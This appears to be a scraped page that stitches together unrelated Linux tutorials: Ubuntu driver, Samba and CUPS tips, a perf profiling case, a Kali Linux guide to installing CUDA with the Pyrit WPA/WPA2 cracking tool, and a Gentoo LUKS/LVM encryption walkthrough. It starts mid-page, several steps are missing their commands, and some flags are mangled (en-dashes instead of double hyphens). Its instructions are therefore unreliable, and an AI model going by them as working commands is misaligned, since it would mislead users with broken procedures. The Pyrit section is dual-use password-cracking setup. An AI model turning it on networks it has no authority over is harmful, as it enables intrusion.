/dev/hda3 /media/games vfat iocharset=utf8,umask=000 0 0

Installation of graphic card drivers

Please note that commands used in this subsection are for Nvidia drivers ONLY – I have several computers, ALL of which have Nvidia graphic cards – but some of the solutions presented work for both Nvidia and ATI cards.

Although I have already discussed the installation of graphic card drivers in my Installing SUSE Linux andInstalling Kubuntu Linux articles, I think a bit of extra guidance will not hurt anyone.

Basically, you can install the graphic card drivers using a Package Manager or via the command line. For most people, the first method should work flawlessly. The first method is embodied in these two commands – the download of the required package and the installation of the driver:

apt-get install nvidia-glx
nvidia-glx-config enable

Some people might prefer to install the drivers manually, with the X Windows stopped. To do this, you literally need to stop the desktop from running.

/etc/init.d/gdm stop
/etc/init.d/kdm stop
/etc/init.d/xdm stop

The desktop should vanish and be replaced with a command line. You will probably need to login. It is possible that you will only see a black screen and no command prompt. Do not be alarmed! Linux operating system usually has 7 virtual consoles. The first six consoles provide a text terminal with a login prompt to a UNIX shell. The 7th virtual console is used to start the X Windows.

In other words, it may occur that by stopping the X Windows you will have simply switched off the graphics AND remain in the 7th virtual console, therefore having no command line to work with. All you need to do is switch to one of the text consoles by pressing Alt + F1-6 on the keyboard. Now, you need to install your driver:


After the installation is complete, you should simply restart the X Windows.

/etc/init.d/gdm start
/etc/init.d/kdm start
/etc/init.d/xdm start

If you see an Nvidia splash logo, it means the driver has been successfully installed. Reboot your machine just to make sure. This is where you might encounter a problem.

Instead of the Nvidia logo, you will see an error message indicating that the X Server has been disabled and that you need to manually edit the settings in the xorg.conf file before being able to proceed to the desktop. Now, there are many possible reasons for such an error and trying to provide a general solution is impossible.

However, I have found the following argument to hold true for many cases: If you have setup your Linux distribution using the GUI installer, you will have probably used the default configurations and the generic kernel will have been installed. I this case, sometimes, the built-in Nvidia driver (nv) might interrupt with the installation. There are two methods for solving this problem.

Method 1: Alberto Milone’s envy package

Envy is a command-line application that will download the latest drivers for your card, clean up old drivers and install the new ones. Instructions for the usage can be found below the download links.

Method 2: Do it yourself

First, download the required driver. Then, execute the following commands:

The offending built-in driver needs to be disabled.

gedit /etc/default/linux-restricted-modules-common

Change the last line to DISABLED_MODULES=”nv”. This will prevent the built-in driver from loading and interrupting with your own installed driver.

Linux commands - linux-restricted

Now, you should remove all conflicting files from your system:

apt-get install linux-headers-`uname -r` build-essential gcc gcc-3.4 xserver-xorg-dev

apt-get –purge remove nvidia-glx nvidia-settings nvidia-kernel-common

rm /etc/init.d/nvidia-*

After the offenders are removed, you should install the drivers from the command line:

/etc/init.d/gdm stop
nvidia-xconfig –add-argb-glx-visuals
/etc/init.d/gdm start

Again, you should see the Nvidia splash logo. Reboot just to make sure there are no more surprises. This should get you up and running with the latest graphic card driver.

Network sharing

If you have more than one computer, you are probably sharing resources among them.There is no reason why you should not continue doing this if one of the machines is running a Linux distribution. Sharing can be accomplished in many ways. Perhaps the simplest is using Samba server. First, install Samba:

apt-get install samba

After the Samba server is installed, you will need to edit a few options in the configuration file to allow sharing privileges.

cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
gedit /etc/samba/smb.conf

In the configuration file, you will need to setup a number of parameters:

  • workgroup = workgroup_name – the name of the Workgroup for your LAN (e.g. HOME)
  • netbios name = netbios_name – without spaces; computer alias by which you will be able to call it across the network
  • security = user

After saving the configuration file, you will have to restart the Samba server:

/etc/init.d/samba restart

Now, select a folder that you wish to share.

Linux commands - samba share 1

If you have ticked the option Writable, you will be able to modify the contents of this folder. Finally, to be able to connect to this share from Windows, you will have to create a Samba user:

smbpasswd -a ‘name’

Under ‘name’ you should specify an existing UNIX user (e.g. roger). Do not forget the apostrophes! You will be asked to create a password. And finally, restart the Samba server again, for the changes to take effect. Now, the sharing itself. Very simple.

Windows > Linux

Start > Run > \\ OR \\netbios_name

When asked for username and password, provide the Samba user name, e.g. roger and the relevant password. And that’s it. Browse to the shared folder. If the shared folder is writable, you will be able to modify the contents.

Linux > Windows

Press Alt + F2. This will bring up the Run Command window. In the Command line, specify the IP address or the name of the computer that you wish to connect. You can see an example below:

Linux commands - samba sharing 2

And that’s it. Easy peasy lemon squeasy!

Printer sharing

Well now, folder and file sharing is really easy. What about the printers? Again, it is very simple. If you have a printer installed on a Windows machine, accessing it from a Linux machine will be easy. The rougher side of the coin is accessing a printer installed on a Linux machine from a Windows machine.First, you will have to allow your printer to be shared. Backup and then edit the Common UNIX Printer System configuration file.

cp /etc/cups/cupds.conf /etc/cups/cupsd.conf.bak
gedit /etc/cups/cupsd.conf

In the file, search for the entry #Listen and add or change as follows:

#Listen OR localhost:631 OR *:631
Listen /var/run/cups/cups.sock

CUPS listens on the port 631. If you use a static IP address for the Linux machine, you can specify only that IP. Otherwise, you might need to use a wildcard. Of course, you should be aware that an open port means a wee less security than before, so keep that in mind. After saving the changes, you will have to restart CUPS:

/etc/init.d/cupsys restart

Now that the printer is available, you will have to add it for the Windows machine.

Start > Settings > Printers and Faxes
File > Add Printer

… A network printer, or a printer attached to another computer …
… Connect to a printer on the Internet or on a home or office network …

When prompted for the driver, either select from a list or install it from a disk (like CD). And that’s it! You can now print from a Windows machine on a printer connected to a Linux machine.

Tip: If you are using a Lexmark printer, you will probably not be able to find the right Linux drivers for your printer. Worry not! Using generic drivers for Hewlett Packard printers will work remarkably well.

Other useful commands

Here’s a tiny sampling of some other useful tools that you might want to know. Be aware that the commands are presented in a generic way only. A variety of options (switches) can be used in conjunction with many of the commands to make their usage far more complex and effective.

Switching between runlevels

init 0-6


telinit 0-6

Backing up the X Windows configuration file

cp /etc/X11/xorg.conf /etc/X11/xorg.conf.bak

Sometimes, you may need or want to configure the X Windows manually:

dpkg-reconfigure xserver-xorg

Display system environment information

You can use the cat (concatenate) command, which will print the contents of the files into the terminal. To display the CPU parameters:

cat /proc/cpuinfo

To display the memory parameters:

cat /proc/meminfo

To find the version of your kernel and the GCC compiler:

cat /proc/version

Furthermore, to find out the version of your kernel:

uname -r

Listing information about files and folders

This command is the equivalent of the DOS dir command.


To display hidden files as well (starting with dot).

ls -a

Kill a process

Sometimes, you may start an application … only it does not really start. So you try again. But this time, your distro informs you that the process is already running. This can also happen in Windows. Sometimes, processes remain open and need to be killed. Before you can kill a process, you need to know its ID. The command below will list all running processes:

ps -elf

Then, kill the offending process by its ID.

kill PID

Alternatively, you can kill a process by its name. The below command will terminate all processes with the corresponding name (or names).

killall process_name


Well, that’s it, for now. Hopefully you have learned something.

If you have had problems with your software installations, compilation from sources, drivers, partitions, and sharing, this article may have helped you overcome some of the problems. Personally, the above tips cover about 90% of tasks that a normal user would have to confront as a part of his/her daily usage. Isn’t Linux so much fun? Well, have fun tweaking.

Slow Linux system? Perf to the rescue!

Perf at a glance

Quoting the original page, Perf is a profiler tool for Linux 2.6+ based systems that abstracts away CPU hardware differences in Linux performance measurements and presents a simple commandline interface. Perf is based on the perf_events interface exported by recent versions of the Linux kernel. Perf notation is somewhat similar to version control tools and strace combined. For example, perf stat will run a command and gather performance counter statistics. Per record will run a command and record its profile into a log file, by default Then, perf report will read the log file created by the perf record execution and display the profile. You may also want to analyze lock events, define probes, and more. There’s even a top mode.

All in all, I am bluffing like a pro, because it is impossible to learn perf in five minutes of reading, especially if you do not have prior Linux knowledge, significant one at that. You will both need to understand the Linux system behavior fairly well, and be somewhat proficient in the concepts of scheduling, memory management, various interfaces, and CPU architecture. Only then will perf make good sense. Still, let us explore a scenario where this tool proves its awesome merit.

Problem what we have

Say you have a Linux system with multiple users working on it, against a remote file system, e.g. NFS. One of the users reports a certain performance degradation in accessing the network objects, like files and directories. Other users have no such woes. As a smart lad, you immediately start a proper investigation, and you grab your favorite tool, strace.

You execute a summary run, with the -c flag, and in both cases, the quantity of system calls and errors, as well as their order is identical. The only difference is that a specific system call for one user takes longer than for the others. You narrow down your tests using the -e flag, which lets you trace individual calls. With the so-called problematic user, you get a consistently slow result for the stat system call:

strace -tt -T -e lstat /usr/bin/stat /nfs/object.txt
14:04:28.659680 lstat(“/nfs/object.txt”, {st_mode=S_IFREG|0755,
st_size=291, …}) = 0 <0.011364>

On the other hand, the so-called healthy user has no such worries:

strace -tt -T -e lstat /usr/bin/stat /nfs/object.txt
14:04:54.032616 lstat(“/nfs/object.txt”, {st_mode=S_IFREG|0755,
st_size=291, …}) = 0 <0.000069>

There is no difference in the environment settings of the two users. They both use identical shells. Everything is perfect except that one small difference in the system call time for stat. With the usual set of your tools, you have just reached a dead end.

Call the cavalry

Now, let us see what perf can do for us. Let us run the test wrapped around the stat command. It is a very good way to start your investigation, because you will get a neat summary of what happens in the kernel, which can then help point out the next lead in your troubleshooting. Indeed, for the healthy system, we get:

Performance counter stats for ‘/usr/bin/stat /nfs/object.txt’:

3.333125  task-clock-msecs         #      0.455 CPUs
6  context-switches         #      0.002 M/sec
0  CPU-migrations           #      0.000 M/sec
326  page-faults              #      0.098 M/sec
3947536  cycles                   #   1184.335 M/sec
2201811  instructions             #      0.558 IPC
45294  cache-references         #     13.589 M/sec
11828  cache-misses             #      3.549 M/sec

0.007327727  seconds time elapsed

For the baddie:

Performance counter stats for ‘/usr/bin/stat /nfs/object.txt’:

14.167143  task-clock-msecs         #      0.737 CPUs
7  context-switches         #      0.000 M/sec
0  CPU-migrations           #      0.000 M/sec
326  page-faults              #      0.023 M/sec
17699949  cycles                   #   1249.366 M/sec
4424158  instructions             #      0.250 IPC
304109  cache-references         #     21.466 M/sec
60553  cache-misses             #      4.274 M/sec

0.019216707  seconds time elapsed

There is a marked difference between the two, as you can observe. While the CPU speed is the same, and the number of migrations, context switches and page faults are identical, the bad user spins approx. five time longer, using more cycles and instructions and everything, resulting in more total time needed for the command to complete. This already shows us there’s something wrong afoot.

Let us explore a little deeper. Let us now record the run and then analyze the data using the report command. This will give us a far more detailed understanding of what really happened. So here’s the report for the good user:

# Samples: 56
# Overhead  Command      Shared Object  Symbol
# ……..  …….  ……………..  ……
5.36%     stat  [kernel]           [k] page_fault
5.36%     perf  /usr/bin/perf      [.] 0x0000000000d099
3.57%     stat  [kernel]           [k] flush_tlb_others_ipi
3.57%     stat  [kernel]           [k] handle_mm_fault
3.57%     stat  [kernel]           [k] find_vma
3.57%     stat  /lib64/libc-2…   [.] __GI_strcmp
3.57%     stat  /lib64/ld-2.11…  [.] _dl_lookup_symbol_x
3.57%     perf  [kernel]           [k] _spin_lock
1.79%     stat  [kernel]           [k] flush_tlb_mm
1.79%     stat  [kernel]           [k] finish_task_switch
1.79%     stat  [kernel]           [k] ktime_get_ts

And for our naughty misbehaver – do note the extra long names of symbols broken into multiple lines for brevity, so do your mental thing and assemble them back. Anyhow, the baddie:

# Samples: 143
# Overhead  Command      Shared Object  Symbol
# ……..  …….  ……………..  ……
57.34%     stat  [kernel]           [k] rpcauth_lookup_
2.80%     stat  [kernel]           [k] generic_match                                                    [sunrpc]
2.10%     stat  [kernel]           [k] clear_page_c
1.40%     stat  [kernel]           [k] flush_tlb_others_ipi
1.40%     stat  [kernel]           [k] __do_fault
1.40%     stat  [kernel]           [k] zap_pte_range
1.40%     stat  [kernel]           [k] handle_mm_fault
1.40%     stat  [kernel]           [k] __link_path_walk
1.40%     stat  [kernel]           [k] page_fault
1.40%     stat  /lib64/libc-2…   [.] __GI_strcmp
1.40%     stat  /lib64/ld-2.11…  [.] _dl_load_cache_lookup

Understanding the report

Before we discuss the results, we need to spend a moment or two to overview the report format. The first column indicates the percentage of the overall samples collected in the corresponding function, similar to what strace -c reports. The second column reports the process from which the samples were collected. In the per-thread/per-process mode, this will always be the name of the monitored command. In the CPU-wide mode, the command name can vary.

The third column shows the name of the ELF image where the samples came from. If a program is dynamically linked, then this may show the name of a shared library. When the samples come from the kernel, then the pseudo ELF image name [kernel.kallsyms] is used. The fourth column indicates the privilege level at which the sample was taken, i.e. when the program was running when it was interrupted. The following levels exist:

  • [.]: user level
  • [k]: kernel level
  • [g]: guest kernel level (virtualization)
  • [u]: guest os user space
  • [H]: hypervisor

The final column shows the symbol name. If you’re interested in learning more about what the specific symbol name does, you can consult The Linux Cross Reference site and search for the specific string entry, or if you have the kernel sources available and installed for your distro, normally under /usr/src/linux, then consult there. Don’t do this for fun, please. There are better ways to spend the afternoon.

Now, the results. We can see the difference immediately. The bad user wastes a lot of time fiddling withrpcauth_lookup_credcache, which is linked inside the sunrpc kernel module. At this point, you have all the information you need to go to the Internet do a very narrow and intelligent search. Just by punching the name of the symbol, you will find two or three mailing list references, pointing to this phenomenon, which in turns, points to a bug.

Your problem is NOT immediately solved, but you know someone else will handle it now, with solid information in your hand. This means reporting the issue to the community, the vendor, or whoever is in charge of your distro, patiently waiting for a fix, or maybe searching for a workaround that might help. But the whole point is that we used perf, which exposed information that we could not have obtained otherwise, and thus, allowed us to move forward in our troubleshooting.

Install Proprietary NVIDIA Driver + kernel Module CUDA and Pyrit on Kali Linux

Install Proprietary NVIDIA Driver On Kali Linux – NVIDIA Accelerated Linux Graphics Driver

This guide explains how to install proprietary “NVIDIA Accelerated Linux Graphics Driver” or NVIDIA driver on Kali Linux system. If you are using Kali Linux and have NVIDIA graphics card then most likely you are using open source NVIDIA driver nouveau. You can see it by lsmod | grep nouveau command. nouveaudriver works quite well, but if you want to use 3D acceleration feature or want to use GPU based applications (such as CUDA and GPU pass through) then you need to install proprietary NVIDIA driver. The proprietary “NVIDIA Accelerated Linux Graphics Driver” provides optimized hardware acceleration of OpenGL applications via a direct-rendering X server. It is a binary-only Xorg driver requiring a Linux kernel module for its use. The first step is to fully update your Kali Linux system and make sure you have the kernel headers installed.

Where you had to download NVIDIA Driver (CUDA) manually and edit grub.cfg file to make everything work. Because it will be a long guide, I had to divide it into two parts:

You use the first guide to install NVIDIA Driver. If you want GPU acceleration, (cudahashcat, GPU pass through etc.) keep reading and follow the second guide to complete your installation. I’ve included as much details I can, including troubleshooting steps and checks but I would like to hear your part of the story, so leave a comment with your findings and issues.

The new NVIDIA Driver

The new Linux binary NVIDIA drivers nvidia-kernel-dkms builds the NVIDIA Xorg binary kernel module needed by NVIDIA driver, using DKMS. Provided that you have the kernel header packages installed, the kernel module will be built for your running kernel and automatically rebuilt for any new kernel headers that are installed. The binary NVIDIA drivers provide optimized hardware acceleration of OpenGL applications via a direct-rendering X Server for graphics cards using NVIDIA chip sets. AGP, PCIe, SLI, TV-out and flat panel displays are also supported. NVIDIA Added support for the following GPU including fixing some issues: (existing GPU’s are already supported).

  • GeForce GT 710
  • GeForce 825M
  1. Fixed a regression that prevented NVIDIA-installer from cleaning up directories created as part of the driver installation.
  2. Added a new X configuration option “InbandStereoSignaling” to enable/disable DisplayPort in-band stereo signaling.
  3. Fixed a bug that caused PBO downloads of cube map faces to retrieve incorrect data.
  4. Fixed a bug in NVIDIA-installer that resulted in spurious error messages when opting out of installing the NVIDIA kernel module or source files for the kernel module.
  5. Added experimental support for ARGB GLX visuals when Xinerama and Composite are enabled at the same time on X.Org xserver 1.15.

See the details about this driver in NVIDIA official website:

Debian Linux usually ports that Official Driver to fit it’s requirements. The NVIDIA driver graphics processing unit (GPU) series/codename of an installed video card can usually be identified using the lspci command. For example:

lspci -nn | grep VGA

My settings

My PC got the following configuration:

I’ve installed everything in a brand new Kali Linux 1.0.6 installation, fully updated and upgraded. Before you do anything, you of course add the Official Kali Linux repository. Once I’ve added the correct Kali Official repositories, I’ve issued the following commands to update, upgrade and dist-upgrade my Kali Linux.

apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

If you’ve completed this part, move on to the next instruction.

Step 1: Install Linux headers

Install Linux headers as those will be required to build NVIDIA Driver modules.

aptitude -r install linux-headers-$(uname -r)

Where -r means install all recommended packages as well.   

Step 2: Install NVIDIA Kernel

Next I installed NVIDIA Kernel

apt-get install nvidia-kernel-$(uname -r)

Step 3: Install NVIDIA Driver Kernel DKMS

We’re almost ready. You can now install new NVIDIA driver nvidia-kernel-dkms by using the following command:

aptitude install nvidia-kernel-dkms

Including dependencies, this is about 24MB is size, depending on how fast Kali repo is working, you might have to wait few minutes. You will get 2 popups, the first one about rebooting after you’ve installed NVIDIA drivernvidia-kernel-dkms that it will disable open source NVIDIA driver nouveau and the second one about xorg.conf file in /etc/X11/ folder.

Press OK on both popups.

Step 4: Install xconfig NVIDIA driver application

If you go through the NVIDIA driver README document, you will see you need to create new XORG server configuration file xorg.conf or modify existing xorg.conf to tell it to load NVIDIA Driver module.nvidia-xconfig package make this task quite easier. All you need to do is to install and execute it.

aptitude install nvidia-xconfig

Step 5: Generate Xorg server configuration file

Now that we have installed nvidia-xconfig package, issue the following command to generate Xorg server configuration file.


It will rename any existing xorg.conf file and create a new one. As directed by NVIDIA drivernvidia-kernel-dkms, reboot your machine to complete installation.

Step 6: Confirming your installation

At this point you should be able to login to your system in Graphical User Mode (GUI). In case you can’t, follow the troubleshooting section at the bottom of this article. As always, we need to check if everything went as expected.

Step 6.a: Check GLX Module

First check if system is using glx module.

glxinfo | grep -i "direct rendering"

It should output “direct rendering: Yes”

Run glxinfo- 7 - Install proprietary NVIDIA driver on Kali Linux - blackMORE Ops

If you do not have glxinfo then first install mesa-utils package then again issue above command and check output

aptitude install mesa-utils

Step 6.b: Check NVIDIA Driver Module

Check if NVIDIA module loaded.

lsmod | grep nvidia

If it produces output like nvidia 9442880 28 or something similar (numbers could be different at your system) then NVIDIA module is loaded.

Step 6.c: Check for Open source NVIDIA Driver nouveau module

Just to be sure Open source NVIDIA Driver nouveau module NOT loaded, issue following command

lsmod | grep nouveau

Run lsmod grep nouveau- 9 - Install proprietary NVIDIA driver on Kali Linux - blackMORE Ops

It should NOT produce any output. If it produces output then something is wrong.

Step 6.d: Confirm if open source NVIDIA Driver nouveau was blacklisted

I like this new NVIDIA Driver. It blacklists Open source NVIDIA Driver nouveau by default. That means less work for us to do. You can confirm it by checking files in the following directory:

cat /etc/modprobe.d/nvidia.conf
cat /etc/modprobe.d/nvidia-blacklists-nouveau.conf
cat /etc/modprobe.d/nvidia-kernel-common.conf


You might get a black screen after installing NVIDIA Driver. Following are your options to fix it:

Troubleshooting Step A: Fixing black screen with a cursor problem

Simply press CTRL + ALT + F1 and login. Type the following


You should now be able to log in using the GDM3 GUI.

Troubleshooting Step B: Delete xorg.conf file

Press CTRL + ALT + F1 and login. Type the following

rm /etc/X11/xorg.conf

After reboot, you should be able to log in using the GDM3 GUI.

Troubleshooting Step C: remove NVIDIA Driver

Press CTRL + ALT + F1 and login. Type the following

apt-get remove nvidia-kernel-dkms

After reboot, you should be able to log in using the GDM3 GUI.


This concludes my general instructions on how to install proprietary NVIDIA driver on Kali Linux – NVIDIA Accelerated Linux Graphics Driver. NVIDIA Optimus users should be able to follow the same instructions, however, as I said before, feel free to share your side of story on how your installation went and correct my guide if required. I am open for discussion and will try to reply back to your comments the earliest possible. For those curious minds, try installing nvidia-settings and see how that goes. NVIDIA Settings will remove NVIDIA Driver but I did manage to make it work with some tinkering. I will try to write another guide on that (NVIDIA Settings presents you with a GUI X Config Window and you can see GPU Temperature and more info)… The proprietary “NVIDIA Accelerated Linux Graphics Driver” provides optimized hardware acceleration of OpenGL applications via a direct-rendering X server, in shoty your NVIDIA Driver give you better display and 3D rendering then you’re all done. You can now play 3D Games. Let me know if you want any specific Linux supported games on Kali and I can write up an article on that. But if you want to run applications that uses NVIDIA Kernel Module CUDA, Pyrit and Cpyrit for GPU processing then you will also need to install CUDA drivers, replace offical Pyrit and install Cpyrit. Find out if your Graphics Card supports CUDA in the following page from NVIDIA

Mine does,

  • GeForce 210.

Next guide will show you how to Install NVIDIA Kernel Module CUDA and Pyrit in Kali Linux – CUDA, pyrit and cpyrit.   Thanks for reading. If this guide helped you to install NVIDIA Driver, please share this article and follow us in Facebook/Twitter.

Install NVIDIA driver kernel Module CUDA and Pyrit on Kali Linux – CUDA, Pyrit and Cpyrit-cuda

In this guide, I will show how to install NVIDIA driver kernel Module CUDA, replace stock Pyrit, and install Cpyrit.At the end of this guide, you will be able to use GPU acceleration for enabled applications such as cudaHashcat, Pyrit, crunch etc.

You use the first guide to install NVIDIA Driver on Kali Linux. I would assume you followed the first guide and completed all steps there and would like to enable GPU acceleration, (cudahashcat, GPU pass through etc.) on your Kali Linux.

CUDA Toolkit

The NVIDIA® CUDA® Toolkit provides a comprehensive development environment for C and C++ developers building GPU-accelerated applications. The CUDA Toolkit includes a compiler for NVIDIA GPUs, math libraries, and tools for debugging and optimizing the performance of your applications. You’ll also find programming guides, user manuals, API reference, and other documentation to help you get started quickly accelerating your application with GPUs. You can read a lot more here in NVIDIA Developers official webpage:

CUDA Toolkit


Following are the prerequisite before you start following this guide:

Prerequisite 1: add Official Kali Linux repository.

I’ve added the correct Kali Official repositories and issued the following commands to update, upgrade and dist-upgrade my Kali Linux.

apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y

Prerequisite 2: Install proprietary NVIDIA driver on Kali Linux

I’ve installed the correct official proprietary NVIDIA driver on Kali Linux – NVIDIA Accelerated Linux Graphics Driver using the previous guide.

If you’ve completed both, move to next instruction.

Step 1: Install NVIDIA CUDA toolkit and openCL

At first we need to install NVIDIA CUDA toolkit and NVIDIA openCL

aptitude install nvidia-cuda-toolkit nvidia-opencl-icd

This will install CUDA packages in your Kali Linux. The total package is pretty large including dependencies, (282MB something), you be patient and let it finish.

Step 2: Download Pyrit and Cpyrit

Download Pyrit and Cpyrit from the official website:

Save them in your /root folder.

Step 3: Install Pyrit

Follow the instructions below to install Pyrit and it’s prerequisites.

Step 3.a: Install Pyrit prerequisites

apt-get install python2.7-dev python2.7-libpcap libpcap-dev

Step 3.b: Remove existing installation of Pyrit

Remove stock Pyrit using the following command:

apt-get remove pyrit

You get a message stating that it will also remove kali-linux-full package. It actually doesn’t. All it does updating Kali repo and remove Pyrit. Finish removing Pyrit.

If you are not using a clean install of Kali (not recommended), you may need to issue the following command:

rm -r /usr/local/lib/python2.7/dist-packages/cpyrit/

Step 3.c: Install new Pyrit

Copy paste the following commands to extract downloaded Pyrit in your Kali Linux /root directory

tar -xzf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0

Now build the package

python build

Once build is complete, you can install Pyrit.

python install

Up to this point, you shouldn’t receive any errors.

Step 4: Install CPyrit-cuda

Copy paste the following commands to extract downloaded CPyrit-cuda in your Kali Linux /root directory

tar -xzf cpyrit-cuda-0.4.0.tar.gz 
cd cpyrit-cuda-0.4.0

Now build the package

python build

Once build is complete, you can install CPyrit-cuda.

python install

Again, you shouldn’t receive any errors, if there’s error, go back and review each steps.

Step 5: Testing and troubleshooting

Now that we’ve installed NVIDIA driver kernel Module CUDA and Pyrit on Kali Linux, we should be able to test it. The best way to test is by issuing the following command:

pyrit list_cores

This gave me an error “ bash: /usr/bin/pyrit: No such file or directory “.

It seems this Pyrit puts its binaries in wrong folder than you’d expect. The actual path for Pyrit is now/usr/local/bin/pyrit

Step 5.a Softlink them or add path to profile

There’s two different ways you can resolve it. You can either softlink or add this /usr/local/bin/ path to your profile. Choice is again yours.

Step 5.a.i: Softlinking
This is what I’ve followed
ln -s /usr/local/bin/pyrit /usr/bin/pyrit

Step 5.a.ii: Add path

If you want only to specific user edit ~/.bash_profile or ~/.bashrc and put there

export PATH=$PATH:/usr/local/bin

If you want for all users edit /etc/profile and scroll down until you see something like

 PATH="/bin:/usr/bin:/sbin:/usr/sbin" export PATH

Append to the end /usr/local/bin. it will be


and Finally

Once you’ve either Softlinked or added the correct path to your profile, then following is what you get

root@kali:~# pyrit list_cores
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg
This code is distributed under the GNU General Public License v3+

The following cores seem available...
#1:  'CUDA-Device #1 'GeForce 210''
#2:  'CPU-Core (SSE2)'
#3:  'CPU-Core (SSE2)'
#4:  'CPU-Core (SSE2)'

and of course I did a benchmark with my GeForce 210 card:

root@kali:~# pyrit benchmark
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg
This code is distributed under the GNU General Public License v3+

Running benchmark (2744.1 PMKs/s)... -

Computed 2744.11 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce 210'': 853.1 PMKs/s (RTT 3.0)
#2: 'CPU-Core (SSE2)': 648.1 PMKs/s (RTT 2.8)
#3: 'CPU-Core (SSE2)': 647.6 PMKs/s (RTT 2.9)
#4: 'CPU-Core (SSE2)': 658.5 PMKs/s (RTT 3.0)


Pyrit allows to create massive databases, pre-computing part of the IEEE 802.11 WPA/WPA2-PSKauthentication phase in a space-time-tradeoff. Exploiting the computational power of Many-Core- and other platforms through ATI-Stream, Nvidia CUDA and OpenCL, it is currently by far the most powerful attack against one of the world’s most used security-protocols.

Here’s a great benchmark done with Pyrit and CUDA for different GPU’s

Thanks for reading. If this guide helped you to install NVIDIA driver kernel Module CUDA and Pyrit on Kali Linux – CUDA, Pyrit and Cpyrit-cuda, please share this article and follow me in Facebook/Twitter.

ah and don’t forget to show off your Pyrit Benchmark. ;)

Linux Gentoo full disk encryption (FDE) with LUKS and LVM2

Creating your encrypted partition

As before using fdisk (or whatever partition tool you prefer) create to partitions.



sda1 above is set to bootable and is of filesystem type 83 (linux). sda2 is of the same filesystem type.

I normally use ext2 for my boot partition but you can use whatever you like.

mkfs.ext2 /dev/sda1

Now we will prepare our encrypted partition. Load the following modules if they aren’t already available.

modprobe dm-crypt
modprobe aes
modprobe sha256

Now format the partition with cryptsetup.

cryptsetup luksFormat /dev/sda2

Create your password and be sure to memorize it.

Now open the encrypted partition.

cryptsetup luksOpen /dev/sda2 main

Enter your password.

You will now have access to your partition in /dev/mapper/main. Keep in mind the name “main” was chosen randomly and is just the name of the file that will represent the unlocked partition. You can change it every time you unlock it if you want.

Now create the physical volume and volume group.

pvcreate /dev/mapper/main
vgcreate [vgname] /dev/mapper/main

Now we create two logical volumes in our new volume group [vgname].

lvcreate -L 1G -n swap [vgname]
lvcreate -L XG -n root [vgname]

Here I chose 1G for the swap partition size. X is just the size of the remaining space available to be for the root partition. You can find the remaining space available with the following command.


If you look at the value for the field “PE Total” you will see how much space is available for allocation. Other fields can also be helpful to such as “allocated” and “free”.

At this point you now have two logical volumes for swap and root respectively. You can now format them as you normally would.

mkswap /dev/vg/vg-swap
mkfs.ext4 /dev/vg/vg-root

At this point the rest of the gentoo handbook applies as normal. The exception is that you will need an initramfs to perform the unlocking of your encrypted partition. After you create your initramfs you will need to make sure to reference it in your grub config or whatever you use to bootstrap your OS installation.

Creating the initramfs

Now onto creating the minifilesystem loaded by the kernel first. This is necessary to decrypt your encrypted partition to allow the boot process to continue.

Create a directory to work under, as we’ll be creating a filesystem.

mkdir initramfs
cd initramfs

Now create the directories with the following.

mkdir -p bin lib dev etc mnt/root proc root sbin sys

Now copy of the usual device nodes from your existing filesystem into your initramfs.

cp -a /dev/{null,console,tty,sda1,sda2} .

Feel free to copy other devices as needed. Also if your drive is not sdaX change it accordingly.

You will want to copy over various utilities that you might want to use as well. Just be sure they are compiled with the “static” use flag as any dependencies binaries have will also need to be copied. To avoid copying over huge chains of dependencies just compile the files you want statically so you won’t have to worry about this.

Since we are using cryptsetup and lvm we will need to copy our cryptsetup and lvm binaries (built statically)  onto the filesystem.

Once you build them statically just copy them into the ./sbin directory.

Its also typical to build busybox and add it to ./bin so feel free to customize.

The main part of the initramfs is the init script in the root of the initramfs. It is what gets executed immediately after the kernel boots and then it, once the real root partition is decrypted, calls the main init script.

Below is part of my initramfs init script. This is the minimum requirement to accomplish the decryption and booting we need.

#mount proc and sys filesystems

mount  -t proc none /proc

mount -t sysfs none /sys

echo 0 > /proc/sys/kernel/printk

# decrypt

/sbin/cryptsetup luksOpen /dev/sda2 main

/sbin/lvm vgscan –mknodes

/sbin/lvm lvchange -aly vg/swap

/sbin/lvm lvchange -aly vg/root


mount /dev/mapper/vg-root /mnt/root


umount /proc

umount /sys

# and we continue

exec switch_root /mnt/root /sbin/init

Save this into your init script.

chmod u+x init

Some of the things I put in here could use a bit of explanation.

The echo 0 disables kernel printk debug messages. I did this because these kernel messages come up a lot, even during typing of my password. I found it irritating so I disabled it during the initramfs process.

The cryptsetup line is pretty straightforward as it lets us unlock our encrypted partition. The following lvm lines are to enable our logical volumes and make the representative device nodes in /dev/mapper.

The final part is where the script hands off control to the decrypted init script on the root partition. Keep in mind that there is a space between the /mnt/root and /sbin/init.

Once you’ve created the filesystem to your needs you must build this mini filesystem into an initrd gzipped cpio type file to be included along with your kernel. To build the initramfs file you can issue the following command.

find . -print0 | cpio --null -ov --format=newc | gzip -9 > /boot/my-initramfs.cpio.gz

Name your initramfs.cpio.gz file however you like and make sure to include it in your bootloader. For grub it would look something like the following.

title=My Linux

root (hd0,0)

kernel /boot/my-kernel

initrd /boot/my-initramfs.cpio.gz

At this point you can reboot your system and test your setup. Your initramfs should load and allow you to enter your encrypted partition password. After that bootup should continue as usual. You can of course make your init script smarter by checking for a correct login or spawning a busybox shell if you need to. These options are left to you.

LVM device nodes

Another thing you might want to do is add a startup script to be executed by your system during boot that will re-create the lvm device nodes as they will no longer exist when the initramfs is removed from memory after it is done. If you use swap your system won’t be able to find /dev/vg/swap since the node for it wouldn’t have been created. I’m not sure why lvm doesn’t automatically see this but I added a simple script to my /etc/local.d/ called 40_fixlvmnodes.start that has the following contents.


echo “creating lvm nodes”

/sbin/lvm vgscan –mknodes

echo “enabling swap”

swapon /dev/vg/swap

Don’t forget to make this script executable too.

chmod u+x 40_fixlvmnodes.start

Be sure to update your /etc/fstab with your root and swap filesystems with the appropriate device paths. Mine looks like this.

/dev/vg/root / ext4 noatime 0 1

/dev/vg/swap none swap sw 0 0

Additional LVM usage

It is useful to become more familiar with lvm as it can be needed if you have to make any changes. For example when I did this on my new laptop I had created the root logical volume too small. It was using only 172G leaving over 500G unallocated! Using lvextend you can add unallocated space to a logical volume provided the physical volume can accommodate it.

lvextend -L+500G /dev/vg/root

